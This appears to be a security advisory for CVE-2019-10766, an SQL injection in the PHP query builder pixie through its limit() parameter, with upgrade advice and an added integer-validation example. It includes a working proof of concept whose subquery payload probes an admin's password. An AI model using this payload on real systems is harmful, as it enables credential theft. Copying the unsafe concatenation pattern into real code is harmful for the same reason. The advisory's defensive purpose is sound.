SQL Injection Affecting usmanhalalit/pixie package, versions <1.0.3 >=2.0.0, <2.0.2
Snyk CVSS
- Attack Complexity: Low
- Integrity: High
- Availability: High
Threat Intelligence
- Exploit Maturity: Proof of concept
- EPSS: 0.21% (59th percentile)
- Snyk ID SNYK-PHP-USMANHALALITPIXIE-534879
- published 19 Nov 2019
- disclosed 28 Oct 2019
- credit Snyk Research
Introduced: 28 Oct 2019
CVE-2019-10766
How to fix?
Upgrade usmanhalalit/pixie to version 1.0.3, 2.0.2 or higher.
Overview
usmanhalalit/pixie is a lightweight, expressive, framework agnostic query builder for PHP.
Affected versions of this package are vulnerable to SQL Injection. The library does not escape the limit() parameter.
PoC by Snyk Security Team
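<?php
require 'vendor/autoload.php';

// Connection settings for a local PostgreSQL test instance
$config = array(
    'driver'   => 'pgsql',
    'host'     => '127.0.0.1',
    'database' => 'postgres',
    'username' => 'postgres',
    'password' => ''
);

// Register the connection and create the QB alias
new \Pixie\Connection('pgsql', $config, 'QB');

// limit() receives a string containing a subquery instead of an integer
$query = QB::table('notes')->limit('(SELECT COUNT(*) FROM users WHERE name=\'admin\' AND password LIKE \'P%\')');
$queryObj = $query->getQuery();
// Print the generated SQL, then run the query
print_r($queryObj->getSql());
echo "\n";
print_r($query->get());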
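
The following is an added example, not code from the advisory or from Pixie: it contrasts a LIMIT value concatenated into a statement with one that is validated as an integer first, using the PoC's subquery string as constructed test input. The function names (buildSelectUnsafe, validateLimit, buildSelectSafe) and the cap of 1000 are assumptions made for illustration, and the builder is a simplified stand-in rather than the library's source.

```php
<?php
// Added example: simplified stand-in for a query builder's LIMIT handling.
// NOT Pixie's source; all function names here are hypothetical.

// Vulnerable shape: the caller's value is concatenated into the statement.
function buildSelectUnsafe(string $table, $limit): string
{
    return "SELECT * FROM \"$table\" LIMIT $limit";
}

// Hardened shape: accept only an integer between 0 and $max.
// The cap of 1000 is an assumed application policy, not a library default.
function validateLimit($value, int $max = 1000): int
{
    $int = filter_var($value, FILTER_VALIDATE_INT, [
        'options' => ['min_range' => 0, 'max_range' => $max],
    ]);
    if ($int === false) {
        throw new InvalidArgumentException("limit must be an integer between 0 and $max");
    }
    return $int;
}

function buildSelectSafe(string $table, $limit): string
{
    return "SELECT * FROM \"$table\" LIMIT " . validateLimit($limit);
}

// Constructed inputs: a legitimate value and the subquery string from the PoC.
$inputs = [
    '10',
    "(SELECT COUNT(*) FROM users WHERE name='admin' AND password LIKE 'P%')",
];

foreach ($inputs as $input) {
    echo "unsafe: ", buildSelectUnsafe('notes', $input), "\n";
    try {
        echo "safe:   ", buildSelectSafe('notes', $input), "\n";
    } catch (InvalidArgumentException $e) {
        echo "safe:   rejected (", $e->getMessage(), ")\n";
    }
}
```

Until the upgrade to 1.0.3 or 2.0.2 is deployed, the same integer check can be applied to any request-supplied value before it is handed to limit().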